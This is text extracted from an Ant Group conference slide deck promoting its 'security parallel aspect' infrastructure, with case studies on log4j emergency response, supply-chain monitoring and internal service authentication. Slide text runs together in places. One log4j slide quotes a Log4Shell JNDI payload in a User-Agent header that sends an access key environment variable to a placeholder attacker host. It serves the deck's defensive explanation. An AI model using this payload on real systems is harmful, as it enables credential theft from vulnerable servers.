安全平行切面：下一代安全基础设施

蚂蚁集团ANTGROUP安全平行切面下一代安全基础设施刘宇江 (羽将)蚂蚁集团2022.09 蚂蚁集团ANT GROUP背景介绍 蚂蚁集团ANTGROUP安全行业的超趋势与挑战重重挑战之下，企业迫切需要更有效的安全对抗与治理方案网络威胁对抗合规风险治理重大漏洞频发国际形势变化三法一典趋势log4Shell spring4shell俄乌冲突《网络安全法》《数据安全法》《个人信息保护法》《民法典》对抗加剧监管趋严安全从“奢侈品”变为“必需品”需要新的变革安全建设难度和治理成本不断提升，企业难以承担对抗难度大治理成本高挑战对抗体系建设治理体系建设数据和应用复杂度爆炸传统安全体系漏洞频发系统、供应链高数据流通链路资产、链路梳业务整改推动力不从心疲于应急速发展快速变化错综复杂理不清成本巨大数据海量化使用方式多样化 蚂蚁集团ANTGROUP安全体系建设的困境和解法安全平行切面体系让企业具备精准的安全感知与干预能力，实现能力与效率的跨越式提升外挂式安全体系：内嵌安全体系：安全平行切面体系：隔靴搔痒绑腿走路融合且解耦“排期一个月，灰度两个月”内嵌式安全应用安全团队业务团队安全团队业务团队安全团队业务团队业务应用外挂式业务应用业务应用安全应用平行空间·看不清，堵不完·业务团队研发排期不吻合·安全管控与业务逻辑既融合又解耦·安全管控效果差·业务团队不响应，安全应急跟不上·安全能力与业务系统各自独立演进 蚂蚁集团ANTGROUP安全平行切面介绍 蚂蚁集团ANTGROUP切面：程序的平行空间面向切面编程OOP(AoP, Aspect-oriented Programming)mixed·AOP的概念最早是由GregorKiczales等人在1997年提出AOP是OOP的延续，OOP从横向上区分出一个个的类来，而AOP则从纵向上向对象中加入特定的代码，增加了一个新的维度AOP可以通过预编译方式和运行其动态代理实现在不修改源代码的情况point cut下给程序动态统一添加某种特定功能的一种技术。可以实现调用者primary和被调用者之间的解耦，提高代码灵活性和可扩展性的一种实现concernsAOP适合解决程序中涉及横切面(cross-cut)的系统功能，这些功point cut能往往用过程编程或者面向对象编程都难以解决logsecurityprofileaspects 蚂蚁集团ANTGROUP安全平行切面：安全防御的平行空间安全平行切面是由蚂蚁集团研发并推广的下一代安全基础设施安全切面保障业务与安全高速演进的同时(AoS, Aspect-oriented Security)在复杂安全风险场景下，安全切面将安·支持业务透视以完成全方位安全治理工全能力系统化的融入技术基础设施与应作 (可治)用服务内部。独立、高效、精确的在应用内部直接检·同时保持安全响应能力与复杂业务逻辑测和阻断各种复杂攻击（可战）的解耦以形成独立的功能切面。 蚂蚁集团安全平行切面技术体系与切面平行舱ANTGROUP安全平行切面可通注入等技术，在不修改应用源码的应用系统情况下给程序动态添加或修改功能，并通过切面平行舱保证其有序运行，提供精准的安全内视与干预服务切点切面平行舱业务空间平行舱是在切面空间内，切面应用的执行环境单元，是切面应用调度和管控的基本颗粒度切面平行舱（实现各类安全管控能力）平行舱特性内视服务干预服务·隔离性：平行舱间具有隔离性·可调度：切面核心可对平行舱进行统一的调度核心API·可管控：切面核心可对平行舱的切点范围和可执行操作进行安全和稳定性控制切面核心类似于云原生的sidecar平行空间 核心架构演进蚂蚁集团ANTGROUP越来越多的切面应用出现在平行空间内部，缺乏隔离与管控将导致平行空间的混乱早期实现一代核心架构二代核心架构隔离、调度、管控隔离、调度、管控隔离、调度、管控。执行逻辑串行于业务逻辑，复用性低、可控性差·逻辑模块化，提高可复用性，优先级和生命周期可控·对平行舱执行逻辑的可执行范围进行精细化管控，具·业务依赖与注入依赖冲突，影响业务稳定·依赖隔离，作用域只限于自身，不会污染业务空间备明确行为预期，敏感操作可审计与管控，降低切面·异常隔离不足，注入逻辑异常必使业务失败被恶意使用的可能性，保障体系的安全、可控运行·分层异常隔离，平行舱异常通过切面核心兜底，核心异可由代理逻辑兜底，最大程度保障业务稳定性应用进程应用进程应用进程业务空间业务空间业务空间业务逻辑业务数据业务逻辑业务数据参数上下文参数上下文业务逻辑业务数据统一代理逻辑统一代理逻辑返回值配置返回值配置参数上下文注入执行逻辑逻辑返回值配置隔离平行空间平行空间平行舱平行舱平行舱平行舱干预切面应用切面应用切面应用切面应用决策注入器切面核心依赖优先级依赖优先级依赖优先级权限依赖优先级权限切面核心切面核心决策器注入器加载器调度器决策器注入器加载器调度器访问控制器系统服务与本地资源系统服务与本地资源 蚂蚁集团ANTGROUP稳定耳易于接入蚂蚁内部覆盖超过95%的应用服务，核心业务100%覆盖，整套体系足够稳定，运行至今0故障1.切面部署2.安全运营覆盖策略研发人员运维人员应用容器应用容器应用服务应用服务超平行空间切Aspect Installer安全团队·能力可持续拓展，动态升级·无需修改业务代码，即可快速部署·安全与业务平行演进，效率跨越式提升·应用一次接入，持续受益 蚂蚁集团ANT GROUP安全平行切面应用实践 蚂蚁集团ANTGROUP安全平行切面：星球、轨道与卫星丰富的切面应用场景，多应用有序共存星球：业务应用空间业务应用空间->星球切面应用->卫星iys平行舱->卫星轨道网络安全：RASP、IAST、平行蜜罐数据治理：血缘分析、流转管控。隐私保护：双重确权、尽责自证·运维：APM、日志标准化卫星：切面应用。稳定性：混沌工程平台·仿真测试：流量录制与重放·国密改造：透明加密蚂蚁已有40+切面应用轨道：平行舱在蚂蚁、网商银行、阿里等均有使用 蚂蚁集团ANTGROUP案例1：log4j应急应用安全切面应对史诗级漏洞log4j的应急响应案例mwareamazoninSTRUTSCNVD-2021-95914T等级：高危影响范围：广MINECRAFTTESLALOG4J利用难度：易Solrwebex druidCLOUDFLARE 蚂蚁集团案例1：log4j应急ANT GROUP通过切面实现精准止血，防御住了40W+次真实攻击，0漏报、0误报，应急人力从6000人日降低到30人日，极大降低风险暴露时间在抵抗攻击的同时抗住了双十二高峰流量，性能与稳定性有保障，业务0打扰平稳度过危机Http requestGET /index.htmlUser-Agent: $(jndi:service:/ /attack.server.url/?s=$(env:AcCEss_KEY_ID))B>controllerbusiness logic安全切面presentation防护策略Log4j2RASP切面应用管控Powered by AOs ContextMapJNDIEventLookUpLookupLookUpJVMJNDI 蚂蚁集团ANTGROUP案例2：供应链安全监测与防护通过切面实现供应链的持续安全监测与未知风险预防·可在测试环境、仿真环境或是真实业务环境中，对动态对关键sink点进行持续监测，细粒度刻画应用和供应链行为画像·相比对比传统的网络、系统层面的监测或静态扫描，通过切面实现的动态监测识别颗粒度更细，结果更为精准·能够发现攻击者的攻击尝试（-1day），提升防御性威慢，在一定程度上对oday未知风险具有预防作用切面应用管控安全切面controllerbusinesslogic防护策略白名单黑名单presentationRASP防控策略防控策略Powered by AOs业务行为存在风险可收敛行为应用研发流程供应链组件动态监控点持续监控应用应用和供应链行为监控行为画像PoweredbyAos关键Sink点网络请求文件读写命令执行 蚂蚁集团ANTGROUP案例3：构建内部服务的防御纵深通过安全切面实现业务无感知的内部服务间鉴权：通过安全切面，可以在内部服务通信链路中，实现对业务透明的可信身份植入、认证与鉴权·对比Sidecar的方式，不会额外增加新的运维成本和计算资源开销，也能实现更细粒度的访问控制和返回控制·增加生产内部的防御纵深，限制边界防御被突破后的东西向探测和移动APP1APP3RPC安全切面business logicAPP2服务间鉴权business logicPowered by AOSRPC安全切面切面应用管控businesslogic服务间鉴权东西向流量审计授权中心Powered byAOs 蚂蚁集团ANTGROUP安全平行切面应用实践效果总结，拦截40万+次log4j2攻击，小时级完成全站精漏洞挖掘实时防御准止血，0误拦，0漏拦，应急人力从6000遗漏率检出量攻击防护漏洞探测防护高风险攻击人日降低到30人日60%8倍70%+90%+60+类下降提升拦截率拦截率防御策略·双12大促封网不受影响，平行止血加固，业务0打扰化解危机资产画像隐私保护·双11、双12流量洪峰值不降级，安全策略检测2.2亿次/分钟接口画像凭据治理应用服务高敏接口隐私信息70%50%27 类100%100%准确率提升完整性提升隐私风险防护鉴权防护流出识别，Spring4Shell超危漏洞应急，获得高度认可 蚂蚁集团ANTGROUP总结安全平行切面：下一代安全基础设施融入技术基础设施与应用服务内部的安全防御平行空间。与业务逻辑解耦，可以独立、高效、精确的支撑安全可治可战任务。安全平行切面可以为企业带来安全效果与效率的跨越式提升扫码下载白皮书支付宝或钉钉扫码咨询平行舱为切面应用的快速增长和有序运行奠定基础，简单的接入方式，可以实现快速低成本覆盖·具备漏洞挖掘、实时防护、隐私保护、资产画像等各类丰富的应用场景·经历了log4j，spring等漏洞实战并取得了出色效果·将通过定向开源的方式与行业共建切面生态，欢迎咨询合作 为世界带来微小而美好的改变Bring small and beautiful changes to the world蚂蚁集团ANTGROUP